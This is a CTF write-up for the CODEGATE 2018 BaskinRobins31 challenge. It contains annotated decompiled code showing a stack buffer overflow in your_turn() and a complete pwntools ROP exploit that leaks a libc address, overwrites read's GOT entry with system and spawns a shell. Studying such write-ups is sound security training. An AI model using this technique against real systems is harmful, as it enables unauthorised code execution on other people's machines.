
[CODEGATE 2018] BaskinRobbins31

ii4gsp 2020. 2. 20. 13:29
// Decompiled entry point of the CODEGATE 2018 BaskinRobins31 game: 31 matches,
// the player and the program alternate, and whoever takes the last match wins.
// The pile counter is shared with my_turn()/your_turn() through a pointer.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  unsigned int v5; // [rsp+8h] [rbp-8h]   matches remaining
  _BOOL4 v6; // [rsp+Ch] [rbp-4h]         1 = the player's move was just accepted, 0 = it is the player's turn

  // Unbuffered stdio (mode 2 == _IONBF on glibc) so prompts show up at once over a pipe.
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  // The PRNG is seeded but nothing in this listing calls rand(); presumably
  // used elsewhere (check_decision() is not shown) -- confirm in the binary.
  v3 = time(0LL);
  srand(v3);
  v5 = 31;
  v6 = 0;
  puts("### This game is similar to the BaskinRobins31 game. ###");
  puts("### The one that take the last match win ###");
  printf("There are %u number(s)\n", 31LL);
  // The signed cast matters: v5 is unsigned, so without it a count that
  // dropped below zero would be a huge positive value and the loop would not end.
  while ( (signed int)v5 > 0 )
  {
    if ( v6 )
    {
      // Program's move; it leaves a multiple of four and takes all four when
      // exactly four remain (see my_turn), so the player cannot win by playing fairly.
      my_turn(&v5);
      v6 = 0;
    }
    else
    {
      // your_turn() returns non-zero only for an accepted move; a rejected
      // move leaves v6 at 0 and the player is simply asked again.
      v6 = (unsigned __int64)your_turn(&v5) != 0;
    }
    printf("remaining number(s) : %i \n", v5);
  }
  // v6 is still 1 only if the player's accepted move emptied the pile.
  if ( v6 )
  {
    puts("Wow! You win!");
    puts("Hint is : ROP");
  }
  else
  {
    puts("You lose!");
  }
  return 0;
}

main()

 

 

 

 

/*
 * The program's move (decompiled from the CODEGATE 2018 binary; the
 * decompiler's __fastcall annotation is dropped here, since it has no effect
 * on x86-64 SysV). *a1 is the number of matches left and is updated in place.
 *
 * Strategy: always leave the player a multiple of four. If the count is not
 * a multiple of four, take (count mod 4); otherwise take a single match.
 * When exactly four remain it takes all four -- breaking the game's own
 * 1-3 rule -- after a short taunt with three one-second pauses.
 *
 * Returns whatever printf() returns for the "I've taken ..." line.
 */
int my_turn(int *a1)
{
  unsigned int taken;

  if (*a1 == 4) {
    /* Cheating branch: clears the pile regardless of the 1-3 rule. */
    taken = 4;
    *a1 = 0;
    puts("HUMMMMMMMMMMM");
    sleep(1u);
    puts("I got this!");
    sleep(1u);
    puts("HA! HA!");
    sleep(1u);
  } else {
    /* Non-multiple of four: take the remainder; multiple of four: take one. */
    taken = (*a1 & 3) ? (unsigned int)(*a1 % 4) : 1u;
    *a1 -= taken;
  }
  return printf("I've taken %i number(s)\n", taken);
}

my_turn()

 

 

 

 

// The player's move (decompiled). Reads the player's input, echoes it back,
// parses it as a decimal count and subtracts it from *a1 if check_decision()
// accepts it. Returns 1 for an accepted move, 0 otherwise.
//
// Stack layout from the decompiler's annotations: s is at rbp-0xB0, so 0xB0
// bytes of input reach the saved rbp and 0xB0 + 8 = 184 bytes reach the saved
// return address -- the padding length used by the exploit below. The slots
// for n (rbp-0x10) and v4 (rbp-0x4) are overwritten on the way, but both are
// assigned only after read() returns, so that does no harm to the attacker.
signed __int64 __fastcall your_turn(_DWORD *a1)
{
  signed __int64 result; // rax
  char s; // [rsp+10h] [rbp-B0h]   input buffer; only 0x96 bytes are cleared
  size_t n; // [rsp+B0h] [rbp-10h]
  int v4; // [rsp+BCh] [rbp-4h]

  v4 = 0;
  memset(&s, 0, 0x96uLL);
  puts("How many numbers do you want to take ? (1-3)");
  // Stack buffer overflow: up to 0x190 (400) bytes are read into a buffer
  // that is only 0x96 (150) bytes of cleared space, with the saved return
  // address 184 bytes past &s. The return value is also unchecked: a failed
  // read() returns -1, which becomes SIZE_MAX in n for the write() below.
  n = read(0, &s, 0x190uLL); // BOF
  // Echoes the raw input (including a ROP chain) back to the client; the
  // exploit simply consumes this echo before reading its leak.
  write(1, &s, n);
  putchar(10);
  // strtoul() stops at the first non-digit; input with no leading digits
  // (such as the NOP sled in the exploit) parses as 0. Note that input longer
  // than the cleared 0x96 bytes is not guaranteed to be NUL-terminated.
  v4 = strtoul(&s, 0LL, 10);
  // check_decision() is not in this listing; presumably it enforces the 1-3
  // rule announced by the prompt -- confirm against the binary.
  if ( (unsigned int)check_decision(v4) )
  {
    *a1 -= v4;
    result = 1LL;
  }
  else
  {
    // A rejected move still returns normally, so the overwritten return
    // address is used either way.
    puts("Don't break the rules...:( ");
    result = 0LL;
  }
  return result;
}

your_turn()

 

 

 

 

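from pwn import *

# Local run against the CODEGATE 2018 BaskinRobins31 binary (x86-64). The
# gadget, PLT and GOT addresses below are fixed, which assumes a non-PIE
# binary (the 0x400000-range addresses are consistent with that). `e.libc`
# is the libc the local loader resolves; against the real service the remote
# libc's symbol offsets must be substituted.
p = process('./BaskinRobins31')
e = ELF('./BaskinRobins31')
libc = e.libc

# Gadgets in the binary (addresses taken from the original write-up).
pppr = 0x000000000040087a     # pop rdi ; pop rsi ; pop rdx ; ret
pop_rdi = 0x0000000000400bc3  # pop rdi ; ret
binsh = b'/bin/sh\x00'

# your_turn() reads up to 0x190 bytes into a buffer at rbp-0xB0, so the saved
# return address sits 0xB0 + 8 = 184 bytes into the input.
PAD = 184

# Writable scratch address for "/bin/sh". This is the start of .bss; the
# remaining chain steps only call read() and system(), so they do not depend
# on whatever the binary keeps there. Use an offset (e.g. e.bss(0x100)) if
# anything stdio-related has to survive.
bss = e.bss()

# ROP chain executed when your_turn() returns:
#  1. write(1, read@got, 8)   -> leak read()'s libc address
#  2. read(0, bss, 8)         -> store "/bin/sh\0"
#  3. read(0, read@got, 8)    -> overwrite read()'s GOT entry with system
#  4. read@plt(bss)           -> now system("/bin/sh")
payload = b'\x90' * PAD
payload += p64(pppr) + p64(1) + p64(e.got['read']) + p64(8) + p64(e.plt['write'])
payload += p64(pppr) + p64(0) + p64(bss) + p64(len(binsh)) + p64(e.plt['read'])
payload += p64(pppr) + p64(0) + p64(e.got['read']) + p64(8) + p64(e.plt['read'])
payload += p64(pop_rdi) + p64(bss) + p64(e.plt['read'])
assert len(payload) + 1 <= 0x190, 'chain does not fit in the 0x190-byte read()'

p.recvuntil(b'(1-3)\n')
# strtoul() on the NOP sled yields 0, the move is rejected, but your_turn()
# still returns into the chain.
p.sendline(payload)

# your_turn() echoes the raw input and prints the rejection line first;
# the leak is the next 8 bytes written by step 1.
p.recvuntil(b':( \n')
leak = u64(p.recvn(8))  # recvn waits for all 8 bytes instead of hoping they arrive in one read
libc_base = leak - libc.symbols['read']
system = libc_base + libc.symbols['system']
log.info('read@libc = %#x' % leak)
log.info('libc base = %#x' % libc_base)

# Steps 2 and 3 consume exactly 8 bytes each, so both inputs can be sent in
# one go. send() rather than sendline() so no stray newline reaches the shell.
p.send(binsh + p64(system))

p.interactive()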

exploit

 

 

 

 
